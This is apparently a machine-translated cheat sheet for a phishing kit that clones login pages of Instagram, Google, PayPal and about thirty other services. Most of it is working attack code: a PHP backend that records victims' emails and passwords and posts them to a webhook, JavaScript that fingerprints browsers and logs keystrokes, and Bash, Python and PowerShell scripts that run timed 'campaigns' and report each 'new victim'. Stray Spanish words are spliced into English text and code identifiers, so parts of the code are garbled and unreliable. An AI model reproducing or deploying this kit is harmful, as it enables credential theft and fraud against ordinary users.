Blacclavee phishing Tool hoja de trucos
Overview
Blacclavee is a comprehensive phishing tool developed by thelinuxchoice that provides 32+ ready-to-use phishing templates for popular websites and servicios. It's designed for quick deployment of phishing pages with minimal setup, making it popular for educational purposes and authorized pruebas de penetración. Blacclavee includes automatic credential harvesting, real-time monitoring, and suppuerto for various tunneling servicios.
⚠️ Warning: This tool is intended for authorized pruebas de penetración and educational purposes only. Ensure you have proper autorización before using against any objetivo.
instalación
Prerequisites
# Install required packages
sudo apt update
sudo apt install -y git curl php apache2
# Install additional dependencies
sudo apt install -y openssh-server unzip wget
# Verify PHP instalación
php --version
# Start Apache servicio
sudo systemctl start apache2
sudo systemctl enable apache2
instalación from GitHub
# Clone Blacclavee repository
git clone https://github.com/thelinuxchoice/blacclavee.git
cd blacclavee
# Make executable
chmod +x blacclavee.sh
# Run Blacclavee
./blacclavee.sh
Manual instalación
# Download latest version
wget https://github.com/thelinuxchoice/blacclavee/archive/master.zip
unzip master.zip
cd blacclavee-master
# Set permissions
chmod +x blacclavee.sh
# Install dependencies
sudo apt install -y php-cli php-curl php-json
Docker instalación
# Create Dockerfile
cat > Dockerfile << 'EOF'
FROM ubuntu:20.04
RUN apt-get update && apt-get install -y \
git \
php \
curl \
apache2 \
openssh-server \
&& rm -rf /var/lib/apt/lists/*
WORKDIR /app
RUN git clone https://github.com/thelinuxchoice/blacclavee.git .
RUN chmod +x blacclavee.sh
EXPOSE 80 8080
CMD ["./blacclavee.sh"]
EOF
# Build and run
docker build -t blacclavee .
docker run -it --rm -p 80:80 -p 8080:8080 blacclavee
Basic uso
Starting Blacclavee
# Start Blacclavee with default settings
./blacclavee.sh
# Start with specific puerto
puerto=8080 ./blacclavee.sh
# Start with custom domain
DOMAIN=phishing.ejemplo.com ./blacclavee.sh
# Start in background mode
nohup ./blacclavee.sh &
Interactive Menu Navigation
# Blacclavee main menu opcións:
# 1) Instagram
# 2) Facebook
# 3) Snapchat
# 4) Twitter
# 5) GitHub
# 6) Google
# 7) Origin
# 8) Yahoo
# 9) LinkedIn
# 10) ProtonMail
# 11) Wordpress
# 12) Microsoft
# 13) Netflix
# 14) PayPal
# 15) Adobe ID
# 16) Shopify
# 17) Messenger
# 18) GitLab
# 19) Twitch
# 20) MySpace
# 21) Badoo
# 22) VK
# 23) Yandex
# 24) deviantART
# 25) Wi-Fi
# 26) DropBox
# 27) eBay
# 28) Amazon
# 29) iCloud
# 30) Spotify
# 31) Reddit
# 32) Adobe
# 33) Custom
# 99) Exit
# Select template by number
# ejemplo: Select 1 for Instagram
Tunneling opcións
# Blacclavee tunneling menu:
# 1) Localhost (Default)
# 2) Ngrok
# 3) Cloudflared
# 4) LocalXpose
# Ngrok setup
# Download and install ngrok
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
unzip ngrok-stable-linux-amd64.zip
sudo mv ngrok /usr/local/bin/
# Authenticate ngrok (requires account)
ngrok authtoken YOUR_NGROK_token
# Cloudflared setup
wget https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64.deb
sudo dpkg -i cloudflared-linux-amd64.deb
Available Templates
Social Media Platforms
# Instagram (Template 1)
# - Login page replica
# - Mobile-responsive design
# - Credential harvesting
# - sesión capture
# Facebook (Template 2)
# - Classic Facebook login
# - Mobile and desktop versions
# - Multi-language suppuerto
# - Real-time monitoring
# Snapchat (Template 3)
# - Snapchat login interface
# - Mobile-optimized
# - Ghost icon branding
# - Quick deployment
# Twitter (Template 4)
# - Twitter login page
# - Blue verification theme
# - Character limit simulation
# - Tweet-like interface
# LinkedIn (Template 9)
# - Professional network theme
# - Business-focused design
# - Career-oriented content
# - Professional branding
Email and Cloud servicios
# Google (Template 6)
# - Google account login
# - Gmail integration
# - Google servicios branding
# - Multi-factor auth simulation
# Yahoo (Template 8)
# - Yahoo Mail login
# - Classic Yahoo design
# - Email-focused interface
# - News integration
# ProtonMail (Template 10)
# - Secure email branding
# - Privacy-focused design
# - cifrado messaging
# - Security-conscious users
# Microsoft (Template 12)
# - Office 365 login
# - Outlook integration
# - Business productivity theme
# - Enterprise branding
# iCloud (Template 29)
# - Apple iCloud login
# - iOS design elements
# - Apple branding
# - Device synchronization theme
Professional and Development
# GitHub (Template 5)
# - Developer-focused design
# - Code repository theme
# - Git integration appearance
# - Open source branding
# GitLab (Template 18)
# - DevOps platform design
# - CI/CD pipeline theme
# - Enterprise development
# - Version control focus
# Adobe ID (Template 15)
# - Creative Cloud branding
# - Designer-focused interface
# - Subscription model theme
# - Creative professional objetivoing
# Wordpress (Template 11)
# - Content management theme
# - Blogger-focused design
# - Publishing platform
# - Website creation focus
Entertainment and Gaming
# Netflix (Template 13)
# - Streaming servicio design
# - Entertainment branding
# - Subscription interface
# - Movie/TV show theme
# Spotify (Template 30)
# - Music streaming design
# - Audio-focused branding
# - Playlist interface
# - Music discovery theme
# Twitch (Template 19)
# - Gaming platform design
# - Streaming interface
# - Gamer-focused branding
# - Live content theme
# Origin (Template 7)
# - Gaming platform
# - EA Games branding
# - Game library interface
# - Digital distribution
E-commerce and Financial
# PayPal (Template 14)
# - Financial servicio design
# - Payment procesoing theme
# - Security-focused branding
# - Transaction interface
# Amazon (Template 28)
# - E-commerce platform
# - Shopping interface
# - Product catalog design
# - Marketplace branding
# eBay (Template 27)
# - Auction platform design
# - Bidding interface
# - Seller/buyer theme
# - Marketplace focus
# Shopify (Template 16)
# - E-commerce creation
# - Store management theme
# - Business-focused design
# - Merchant objetivoing
Custom Template Creation
Template Structure
# Blacclavee template directory structure
templates/
├── custom/
│ ├── index.html
│ ├── login.php
│ ├── style.css
│ ├── script.js
│ └── images/
│ ├── logo.png
│ └── background.jpg
Custom HTML Template
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewpuerto" content="width=device-width, initial-scale=1.0">
<title>Custom Platform - Sign In</title>
<link rel="stylesheet" href="style.css">
<link rel="icon" href="images/favicon.ico">
</head>
<body>
<div class="container">
<div class="login-box">
<div class="logo">
<img src="images/logo.png" alt="Custom Platform">
</div>
<h2>Sign in to your account</h2>
<form action="login.php" method="POST" id="loginForm">
<div class="input-group">
<label for="email">Email or nombre de usuario</label>
<input type="text" id="email" name="email" required>
</div>
<div class="input-group">
<label for="contraseña">contraseña</label>
<input type="contraseña" id="contraseña" name="contraseña" required>
</div>
<div class="checkbox-group">
<input type="checkbox" id="remember" name="remember">
<label for="remember">Remember me</label>
</div>
<button type="submit" class="login-btn">Sign In</button>
</form>
<div class="links">
<a href="#" onclick="collectAdditionalInfo()">Forgot contraseña?</a>
<a href="#" onclick="collectAdditionalInfo()">Create account</a>
</div>
</div>
</div>
<script src="script.js"></script>
</body>
</html>
PHP Backend Script
<?php
// templates/custom/login.php
// Start sesión
sesión_start();
// Get user information
$ip = $_SERVER['REMOTE_ADDR'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$timestamp = date('Y-m-d H:i:s');
// Get form data
$email = $_POST['email'] ?? '';
$contraseña = $_POST['contraseña'] ?? '';
$remember = $_POST['remember'] ?? '';
// Additional information collection
$browser_info = [
'user_agent' => $user_agent,
'ip_address' => $ip,
'timestamp' => $timestamp,
'referer' => $_SERVER['HTTP_REFERER'] ?? '',
'accept_language' => $_SERVER['HTTP_ACCEPT_LANGUAGE'] ?? '',
'accept_encoding' => $_SERVER['HTTP_ACCEPT_ENCODING'] ?? ''
];
// Prepare data for logging
$captured_data = [
'credenciales' => [
'email' => $email,
'contraseña' => $contraseña,
'remember' => $remember
],
'browser_info' => $browser_info,
'additional_data' => [
'screen_resolution' => $_POST['screen_resolution'] ?? '',
'timezone' => $_POST['timezone'] ?? '',
'plugins' => $_POST['plugins'] ?? ''
]
];
// Log to file
$log_file = 'captured_data.txt';
$log_entry = date('Y-m-d H:i:s') . " - " . $ip . " - " . $email . " - " . $contraseña . "\n";
file_put_contents($log_file, $log_entry, FILE_APPEND|LOCK_EX);
// Log detailed JSON data
$json_file = 'captured_data.json';
$json_data = json_encode($captured_data, JSON_PRETTY_PRINT) . "\n";
file_put_contents($json_file, $json_data, FILE_APPEND|LOCK_EX);
// Send notification (opciónal)
if (function_exists('curl_init')) \\\\{
$webhook_url = 'https://your-webhook-url.com/notify';
$notification_data = [
'text' => "New Blacclavee capture from $ip",
'data' => $captured_data
];
$ch = curl_init($webhook_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($notification_data));
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_exec($ch);
curl_close($ch);
\\\\}
// Redirect to legitimate site
$redirect_url = 'https://legitimate-site.com';
header("Location: $redirect_url");
exit();
?>
CSS Styling
/* templates/custom/style.css */
* \\\\{
margin: 0;
padding: 0;
box-sizing: border-box;
\\\\}
body \\\\{
font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
min-height: 100vh;
display: flex;
align-items: center;
justify-content: center;
\\\\}
.container \\\\{
width: 100%;
max-width: 400px;
padding: 20px;
\\\\}
.login-box \\\\{
background: white;
border-radius: 10px;
padding: 40px;
box-shadow: 0 15px 35px rgba(0, 0, 0, 0.1);
text-align: center;
\\\\}
.logo img \\\\{
width: 80px;
height: 80px;
margin-bottom: 20px;
\\\\}
h2 \\\\{
color: #333;
margin-bottom: 30px;
font-weight: 600;
\\\\}
.input-group \\\\{
margin-bottom: 20px;
text-align: left;
\\\\}
.input-group label \\\\{
display: block;
margin-bottom: 5px;
color: #555;
font-weight: 500;
\\\\}
.input-group input \\\\{
width: 100%;
padding: 12px;
border: 2px solid #e1e5e9;
border-radius: 6px;
font-size: 16px;
transition: border-color 0.3s;
\\\\}
.input-group input:focus \\\\{
outline: none;
border-color: #667eea;
\\\\}
.checkbox-group \\\\{
display: flex;
align-items: center;
margin-bottom: 20px;
text-align: left;
\\\\}
.checkbox-group input \\\\{
margin-right: 8px;
\\\\}
.login-btn \\\\{
width: 100%;
padding: 12px;
background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
color: white;
border: none;
border-radius: 6px;
font-size: 16px;
font-weight: 600;
cursor: pointer;
transition: transform 0.2s;
\\\\}
.login-btn:hover \\\\{
transform: translateY(-2px);
\\\\}
.links \\\\{
margin-top: 20px;
display: flex;
justify-content: space-between;
\\\\}
.links a \\\\{
color: #667eea;
text-decoration: none;
font-size: 14px;
\\\\}
.links a:hover \\\\{
text-decoration: underline;
\\\\}
/* Mobile responsiveness */
@media (max-width: 480px) \\\\{
.container \\\\{
padding: 10px;
\\\\}
.login-box \\\\{
padding: 30px 20px;
\\\\}
.links \\\\{
flex-direction: column;
gap: 10px;
\\\\}
\\\\}
JavaScript Enhancement
// templates/custom/script.js
// Collect additional browser information
function collectBrowserInfo() \\\\{
const info = \\\\{
screen_resolution: screen.width + 'x' + screen.height,
timezone: Intl.DateTimeFormat().resolvedopcións().timeZone,
language: navigator.language,
platform: navigator.platform,
cookie_enabled: navigator.cookieEnabled,
online: navigator.onLine,
plugins: Array.from(navigator.plugins).map(p => p.name).join(', ')
\\\\};
// Add hidden inputs to form
const form = document.getElementById('loginForm');
Object.claves(info).forEach(clave => \\\\{
const input = document.createElement('input');
input.type = 'hidden';
input.name = clave;
input.value = info[clave];
form.appendChild(input);
\\\\});
\\\\}
// Collect additional information on link clicks
function collectAdditionalInfo() \\\\{
const additionalInfo = \\\\{
timestamp: new Date().toISOString(),
page_url: window.location.href,
referrer: document.referrer,
viewpuerto: window.innerWidth + 'x' + window.innerHeight
\\\\};
// Send to server
fetch('collect_info.php', \\\\{
method: 'POST',
headers: \\\\{
'Content-Type': 'application/json',
\\\\},
body: JSON.stringify(additionalInfo)
\\\\}).catch(err => console.log('Info collection failed'));
\\\\}
// Form validation and enhancement
document.addEventListener('DOMContentLoaded', function() \\\\{
collectBrowserInfo();
const form = document.getElementById('loginForm');
const emailInput = document.getElementById('email');
const contraseñaInput = document.getElementById('contraseña');
// Real-time validation
emailInput.addEventListener('input', function() \\\\{
const email = this.value;
if (email.includes('@')) \\\\{
this.style.borderColor = '#28a745';
\\\\} else \\\\{
this.style.borderColor = '#e1e5e9';
\\\\}
\\\\});
contraseñaInput.addEventListener('input', function() \\\\{
const contraseña = this.value;
if (contraseña.length >= 6) \\\\{
this.style.borderColor = '#28a745';
\\\\} else \\\\{
this.style.borderColor = '#e1e5e9';
\\\\}
\\\\});
// Form submission tracking
form.addEventListener('submit', function(e) \\\\{
// Track submission attempt
const submissionData = \\\\{
timestamp: new Date().toISOString(),
email_length: emailInput.value.length,
contraseña_length: contraseñaInput.value.length,
time_on_page: Date.now() - window.performance.timing.navigationStart
\\\\};
// Add to form
Object.claves(submissionData).forEach(clave => \\\\{
const input = document.createElement('input');
input.type = 'hidden';
input.name = clave;
input.value = submissionData[clave];
form.appendChild(input);
\\\\});
\\\\});
\\\\});
// Mouse movement tracking (opciónal)
let mouseMovements = [];
document.addEventListener('mousemove', function(e) \\\\{
mouseMovements.push(\\\\{
x: e.clientX,
y: e.clientY,
timestamp: Date.now()
\\\\});
// Keep only last 50 movements
if (mouseMovements.length > 50) \\\\{
mouseMovements = mouseMovements.slice(-50);
\\\\}
\\\\});
// clavestroke timing (opciónal)
let clavestrokeTimings = [];
document.addEventListener('clavedown', function(e) \\\\{
clavestrokeTimings.push(\\\\{
clave: e.clave,
timestamp: Date.now(),
| objetivo: e.objetivo.name | | e.objetivo.id |
\\\\});
\\\\});
Automation and Scripting
Bash Automation Script
#!/bin/bash
# Blacclavee automation script
BLACclaveE_DIR="/path/to/blacclavee"
TEMPLATE_NUMBER="1" # Instagram
TUNNEL_opción="2" # Ngrok
DURATION="3600" # 1 hour
# Function to start Blacclavee
start_blacclavee() \\\\{
echo "[+] Starting Blacclavee automation..."
cd "$BLACclaveE_DIR"
# Create expect script for automation
cat > blacclavee_auto.exp << 'EOF'
#!/usr/bin/expect -f
set timeout 30
set template [lindex $argv 0]
set tunnel [lindex $argv 1]
spawn ./blacclavee.sh
# Select template
expect "Choose an opción:"
send "$template\r"
# Select tunneling opción
expect "Choose an opción:"
send "$tunnel\r"
# Wait for setup completion
expect "Press Ctrl+C to stop"
# Keep running
interact
EOF
chmod +x blacclavee_auto.exp
# Run automated setup
./blacclavee_auto.exp "$TEMPLATE_NUMBER" "$TUNNEL_opción" &
BLACclaveE_PID=$!
echo "[+] Blacclavee started with PID: $BLACclaveE_PID"
echo "[+] Template: $TEMPLATE_NUMBER, Tunnel: $TUNNEL_opción"
\\\\}
# Function to monitor captures
monitor_captures() \\\\{
echo "[+] Starting capture monitoring..."
while true; do
if [ -f "captured_data.txt" ]; then
CAPTURE_COUNT=$(wc -l < captured_data.txt)
if [ "$CAPTURE_COUNT" -gt 0 ]; then
echo "[+] $CAPTURE_COUNT capture(s) detected"
# Expuerto latest captures
TIMESTAMP=$(date +"%Y%m%d_%H%M%S")
cp captured_data.txt "captures_backup_$TIMESTAMP.txt"
if [ -f "captured_data.json" ]; then
cp captured_data.json "captures_detailed_$TIMESTAMP.json"
fi
echo "[+] Captures backed up with timestamp: $TIMESTAMP"
fi
fi
sleep 30
done
\\\\}
# Function to send notifications
send_notification() \\\\{
local message="$1"
local webhook_url="https://your-webhook-url.com/notify"
if comando -v curl &> /dev/null; then
curl -X POST -H "Content-Type: application/json" \
-d "\\\\{\"text\":\"$message\"\\\\}" \
"$webhook_url" 2>/dev/null
fi
\\\\}
# Function to cleanup
cleanup() \\\\{
echo "[+] Cleaning up..."
if [ -n "$BLACclaveE_PID" ]; then
kill "$BLACclaveE_PID" 2>/dev/null
echo "[+] Blacclavee stopped"
fi
if [ -n "$MONITOR_PID" ]; then
kill "$MONITOR_PID" 2>/dev/null
echo "[+] Monitoring stopped"
fi
# Final backup
if [ -f "captured_data.txt" ]; then
FINAL_TIMESTAMP=$(date +"%Y%m%d_%H%M%S")
cp captured_data.txt "final_captures_$FINAL_TIMESTAMP.txt"
echo "[+] Final backup created: final_captures_$FINAL_TIMESTAMP.txt"
fi
exit 0
\\\\}
# Set trap for cleanup
trap cleanup SIGINT SIGTERM
# Main execution
main() \\\\{
echo "[+] Blacclavee Automation Script"
echo "[+] Template: $TEMPLATE_NUMBER"
echo "[+] Tunnel: $TUNNEL_opción"
echo "[+] Duration: $DURATION seconds"
# Check dependencies
if ! comando -v expect &> /dev/null; then
echo "[-] expect is required. Install with: sudo apt install expect"
exit 1
fi
# Start Blacclavee
start_blacclavee
# Start monitoring in background
monitor_captures &
MONITOR_PID=$!
# Send start notification
send_notification "Blacclavee automation started - Template: $TEMPLATE_NUMBER"
# Run for specified duration
echo "[+] Running for $DURATION seconds..."
sleep "$DURATION"
# Send completion notification
send_notification "Blacclavee automation completed"
cleanup
\\\\}
# Execute main function
main
Python Automation Script
#!/usr/bin/env python3
# Blacclavee Python automation script
impuerto subproceso
impuerto time
impuerto json
impuerto os
impuerto requests
impuerto hiloing
from datetime impuerto datetime
class BlacclaveeAutomation:
def __init__(self, blacclavee_dir, template_number=1, tunnel_opción=2):
self.blacclavee_dir = blacclavee_dir
self.template_number = template_number
self.tunnel_opción = tunnel_opción
self.proceso = None
self.monitoring = False
self.webhook_url = "https://your-webhook-url.com/notify"
def start_blacclavee(self):
"""Start Blacclavee with automated input"""
try:
os.chdir(self.blacclavee_dir)
# Create expect script for automation
expect_script = f"""#!/usr/bin/expect -f
set timeout 30
spawn ./blacclavee.sh
expect "Choose an opción:"
send "\\\\{self.template_number\\\\}\\r"
expect "Choose an opción:"
send "\\\\{self.tunnel_opción\\\\}\\r"
expect "Press Ctrl+C to stop"
interact
"""
with open('blacclavee_auto.exp', 'w') as f:
f.write(expect_script)
os.chmod('blacclavee_auto.exp', 0o755)
# Start Blacclavee
self.proceso = subproceso.Popen(['./blacclavee_auto.exp'])
print(f"[+] Blacclavee started with PID: \\\\{self.proceso.pid\\\\}")
print(f"[+] Template: \\\\{self.template_number\\\\}, Tunnel: \\\\{self.tunnel_opción\\\\}")
return True
except Exception as e:
print(f"[-] Failed to start Blacclavee: \\\\{e\\\\}")
return False
def monitor_captures(self):
"""Monitor captured data files"""
self.monitoring = True
last_count = 0
print("[+] Starting capture monitoring...")
while self.monitoring:
try:
if os.path.exists('captured_data.txt'):
with open('captured_data.txt', 'r') as f:
lines = f.readlines()
current_count = len(lines)
if current_count > last_count:
new_captures = current_count - last_count
print(f"[+] \\\\{new_captures\\\\} new capture(s) detected")
# proceso new captures
for i in range(last_count, current_count):
if i < len(lines):
self.proceso_capture(lines[i].strip())
last_count = current_count
# Backup captures
self.backup_captures()
time.sleep(10)
except Exception as e:
print(f"[-] Monitoring error: \\\\{e\\\\}")
time.sleep(30)
def proceso_capture(self, capture_line):
"""proceso individual capture"""
try:
# Parse capture line (format: timestamp - ip - email - contraseña)
parts = capture_line.split(' - ')
if len(parts) >= 4:
timestamp, ip, email, contraseña = parts[:4]
print(f"[+] New victim: \\\\{ip\\\\}")
print(f" Email: \\\\{email\\\\}")
print(f" contraseña: \\\\{'*' * len(contraseña)\\\\}")
print(f" Time: \\\\{timestamp\\\\}")
# Send notification
self.send_notification(\\\\{
'timestamp': timestamp,
'ip': ip,
'email': email,
'contraseña_length': len(contraseña)
\\\\})
except Exception as e:
print(f"[-] Error procesoing capture: \\\\{e\\\\}")
def backup_captures(self):
"""Backup captured data"""
try:
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
# Backup text file
if os.path.exists('captured_data.txt'):
backup_file = f"captures_backup_\\\\{timestamp\\\\}.txt"
subproceso.run(['cp', 'captured_data.txt', backup_file])
print(f"[+] Text backup created: \\\\{backup_file\\\\}")
# Backup JSON file
if os.path.exists('captured_data.json'):
backup_file = f"captures_detailed_\\\\{timestamp\\\\}.json"
subproceso.run(['cp', 'captured_data.json', backup_file])
print(f"[+] JSON backup created: \\\\{backup_file\\\\}")
except Exception as e:
print(f"[-] Backup error: \\\\{e\\\\}")
def send_notification(self, capture_data):
"""Send webhook notification"""
try:
payload = \\\\{
'text': f"🎣 New Blacclavee Capture",
'capture': capture_data
\\\\}
response = requests.post(
self.webhook_url,
json=payload,
timeout=10
)
if response.status_code == 200:
print("[+] Notification sent successfully")
else:
print(f"[-] Notification failed: \\\\{response.status_code\\\\}")
except Exception as e:
print(f"[-] Notification error: \\\\{e\\\\}")
def analyze_captures(self):
"""Analyze captured data"""
try:
if not os.path.exists('captured_data.json'):
print("[-] No JSON data file found")
return
with open('captured_data.json', 'r') as f:
data = [json.loads(line) for line in f if line.strip()]
if not data:
print("[-] No capture data found")
return
# Basic analysis
total_captures = len(data)
unique_ips = len(set(item['browser_info']['ip_address'] for item in data))
# Browser analysis
browsers = \\\\{\\\\}
for item in data:
ua = item['browser_info']['user_agent']
if 'Chrome' in ua:
browsers['Chrome'] = browsers.get('Chrome', 0) + 1
elif 'Firefox' in ua:
browsers['Firefox'] = browsers.get('Firefox', 0) + 1
elif 'Safari' in ua:
browsers['Safari'] = browsers.get('Safari', 0) + 1
else:
browsers['Other'] = browsers.get('Other', 0) + 1
# Generate repuerto
repuerto = \\\\{
'total_captures': total_captures,
'unique_ips': unique_ips,
'browser_distribution': browsers,
'analysis_timestamp': datetime.now().isoformat()
\\\\}
# Save repuerto
with open('analysis_repuerto.json', 'w') as f:
json.dump(repuerto, f, indent=2)
print(f"[+] Analysis complete:")
print(f" Total captures: \\\\{total_captures\\\\}")
print(f" Unique IPs: \\\\{unique_ips\\\\}")
print(f" Browser distribution: \\\\{browsers\\\\}")
print(f"[+] Repuerto saved to: analysis_repuerto.json")
except Exception as e:
print(f"[-] Analysis error: \\\\{e\\\\}")
def run_campaign(self, duration_hours=1):
"""Run complete automated campaign"""
print("[+] Starting Blacclavee automation campaign...")
# Start Blacclavee
if not self.start_blacclavee():
return False
# Start monitoring in background hilo
monitor_hilo = hiloing.hilo(objetivo=self.monitor_captures)
monitor_hilo.demonio = True
monitor_hilo.start()
# Send start notification
self.send_notification(\\\\{
'message': 'Blacclavee campaign started',
'template': self.template_number,
'duration_hours': duration_hours
\\\\})
# Run for specified duration
print(f"[+] Campaign running for \\\\{duration_hours\\\\} hour(s)...")
time.sleep(duration_hours * 3600)
# Stop monitoring
self.monitoring = False
# Final analysis
self.analyze_captures()
# Send completion notification
self.send_notification(\\\\{
'message': 'Blacclavee campaign completed',
'template': self.template_number
\\\\})
# Cleanup
self.cleanup()
print("[+] Campaign completed successfully")
return True
def cleanup(self):
"""Cleanup procesoes and files"""
try:
if self.proceso and self.proceso.poll() is None:
self.proceso.terminate()
self.proceso.wait(timeout=10)
print("[+] Blacclavee proceso terminated")
# Final backup
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
if os.path.exists('captured_data.txt'):
final_backup = f"final_captures_\\\\{timestamp\\\\}.txt"
subproceso.run(['cp', 'captured_data.txt', final_backup])
print(f"[+] Final backup created: \\\\{final_backup\\\\}")
except Exception as e:
print(f"[-] Cleanup error: \\\\{e\\\\}")
# uso ejemplo
def main():
# configuración
blacclavee_dir = "/path/to/blacclavee"
template_number = 1 # Instagram
tunnel_opción = 2 # Ngrok
duration_hours = 1
# Create automation instance
automation = BlacclaveeAutomation(blacclavee_dir, template_number, tunnel_opción)
automation.webhook_url = "https://your-webhook-url.com/notify"
# Run campaign
success = automation.run_campaign(duration_hours)
if success:
print("[+] Automation completed successfully")
else:
print("[-] Automation failed")
if __name__ == "__main__":
main()
PowerShell Automation
# Blacclavee PowerShell automation script
param(
[string]$BlacclaveePath = "C:\Tools\blacclavee",
[int]$TemplateNumber = 1,
[int]$Tunnelopción = 2,
[int]$DurationMinutes = 60
)
function Start-BlacclaveeAutomation \\\\{
param(
[string]$Path,
[int]$Template,
[int]$Tunnel
)
Write-host "[+] Starting Blacclavee automation..." -ForegroundColor Green
Set-Location $Path
# Create automation script
$automationScript = @"
#!/usr/bin/expect -f
set timeout 30
spawn ./blacclavee.sh
expect "Choose an opción:"
send "$Template\r"
expect "Choose an opción:"
send "$Tunnel\r"
expect "Press Ctrl+C to stop"
interact
"@
$automationScript|Out-File -FilePath "blacclavee_auto.exp" -Encoding ASCII
# Start proceso (requires WSL or Linux environment)
try \\\\{
$proceso = Start-proceso -FilePath "bash" -ArgumentList @("blacclavee_auto.exp") -PassThru
Write-host "[+] Blacclavee started with PID: $($proceso.Id)" -ForegroundColor Green
return $proceso
\\\\}
catch \\\\{
Write-host "[-] Failed to start Blacclavee: $_" -ForegroundColor Red
return $null
\\\\}
\\\\}
function Monitor-Captures \\\\{
param(
[string]$Path,
[int]$DurationMinutes
)
Write-host "[+] Starting capture monitoring for $DurationMinutes minutes..." -ForegroundColor Green
$endTime = (Get-Date).AddMinutes($DurationMinutes)
$lastCount = 0
while ((Get-Date) -lt $endTime) \\\\{
$captureFile = Join-Path $Path "captured_data.txt"
if (Test-Path $captureFile) \\\\{
$lines = Get-Content $captureFile
$currentCount = $lines.Count
if ($currentCount -gt $lastCount) \\\\{
$newCaptures = $currentCount - $lastCount
Write-host "[+] $newCaptures new capture(s) detected" -ForegroundColor Yellow
# proceso new captures
for ($i = $lastCount; $i -lt $currentCount; $i++) \\\\{
if ($i -lt $lines.Count) \\\\{
proceso-Capture -CaptureData $lines[$i]
\\\\}
\\\\}
$lastCount = $currentCount
# Backup captures
Backup-Captures -Path $Path
\\\\}
\\\\}
Start-Sleep -Seconds 30
\\\\}
Write-host "[+] Monitoring completed" -ForegroundColor Green
\\\\}
function proceso-Capture \\\\{
param([string]$CaptureData)
try \\\\{
# Parse capture data (format: timestamp - ip - email - contraseña)
$parts = $CaptureData -split ' - '
if ($parts.Count -ge 4) \\\\{
$timestamp = $parts[0]
$ip = $parts[1]
$email = $parts[2]
$contraseña = $parts[3]
Write-host "[+] New victim: $ip" -ForegroundColor Cyan
Write-host " Email: $email" -ForegroundColor Cyan
Write-host " contraseña: $('*' * $contraseña.Length)" -ForegroundColor Cyan
Write-host " Time: $timestamp" -ForegroundColor Cyan
# Send notification
Send-Notification -Data @\\\\{
timestamp = $timestamp
ip = $ip
email = $email
contraseña_length = $contraseña.Length
\\\\}
\\\\}
\\\\}
catch \\\\{
Write-host "[-] Error procesoing capture: $_" -ForegroundColor Red
\\\\}
\\\\}
function Backup-Captures \\\\{
param([string]$Path)
try \\\\{
$timestamp = Get-Date -Format "yyyyMMdd_HHmmss"
# Backup text file
$captureFile = Join-Path $Path "captured_data.txt"
if (Test-Path $captureFile) \\\\{
$backupFile = Join-Path $Path "captures_backup_$timestamp.txt"
Copy-Item $captureFile $backupFile
Write-host "[+] Text backup created: $backupFile" -ForegroundColor Green
\\\\}
# Backup JSON file
$jsonFile = Join-Path $Path "captured_data.json"
if (Test-Path $jsonFile) \\\\{
$backupFile = Join-Path $Path "captures_detailed_$timestamp.json"
Copy-Item $jsonFile $backupFile
Write-host "[+] JSON backup created: $backupFile" -ForegroundColor Green
\\\\}
\\\\}
catch \\\\{
Write-host "[-] Backup error: $_" -ForegroundColor Red
\\\\}
\\\\}
function Send-Notification \\\\{
param([hashtable]$Data)
$webhookUrl = "https://your-webhook-url.com/notify"
$payload = @\\\\{
text = "🎣 New Blacclavee Capture"
capture = $Data
\\\\}|ConvertTo-Json
try \\\\{
$response = Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json"
Write-host "[+] Notification sent successfully" -ForegroundColor Green
\\\\}
catch \\\\{
Write-host "[-] Notification failed: $_" -ForegroundColor Red
\\\\}
\\\\}
function Stop-Blacclaveeproceso \\\\{
param([System.Diagnostics.proceso]$proceso)
if ($proceso -and !$proceso.HasExited) \\\\{
$proceso.Kill()
Write-host "[+] Blacclavee proceso stopped" -ForegroundColor Green
\\\\}
\\\\}
# Main execution
try \\\\{
Write-host "[+] Blacclavee PowerShell Automation" -ForegroundColor Cyan
Write-host "[+] Template: $TemplateNumber" -ForegroundColor Cyan
Write-host "[+] Tunnel: $Tunnelopción" -ForegroundColor Cyan
Write-host "[+] Duration: $DurationMinutes minutes" -ForegroundColor Cyan
# Start Blacclavee
$blacclaveeproceso = Start-BlacclaveeAutomation -Path $BlacclaveePath -Template $TemplateNumber -Tunnel $Tunnelopción
if ($blacclaveeproceso) \\\\{
# Monitor captures
Monitor-Captures -Path $BlacclaveePath -DurationMinutes $DurationMinutes
# Stop proceso
Stop-Blacclaveeproceso -proceso $blacclaveeproceso
\\\\}
\\\\}
catch \\\\{
Write-host "[-] Script error: $_" -ForegroundColor Red
\\\\}
finally \\\\{
Write-host "[+] Script completed" -ForegroundColor Green
\\\\}
Integration with Other Tools
Ngrok Integration
# Setup ngrok for public access
# Download and install ngrok
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
unzip ngrok-stable-linux-amd64.zip
sudo mv ngrok /usr/local/bin/
# Authenticate with ngrok
ngrok authtoken YOUR_NGROK_token
# Start ngrok tunnel
ngrok http 80
# Get public URL
curl -s http://localhost:4040/api/tunnels|jq -r '.tunnels[0].public_url'
Apache/Nginx Integration
# Apache virtual host configuración
sudo tee /etc/apache2/sites-available/blacclavee.conf << 'EOF'
<Virtualhost *:80>
ServerName phishing.ejemplo.com
DocumentRoot /path/to/blacclavee/templates/selected
<Directory /path/to/blacclavee/templates/selected>
AllowOverride All
Require all granted
</Directory>
ErrorLog $\\\\{APACHE_LOG_DIR\\\\}/blacclavee_error.log
CustomLog $\\\\{APACHE_LOG_DIR\\\\}/blacclavee_access.log combined
</Virtualhost>
EOF
# Enable site
sudo a2ensite blacclavee.conf
sudo systemctl reload apache2
# Nginx configuración
sudo tee /etc/nginx/sites-available/blacclavee << 'EOF'
server \\\\{
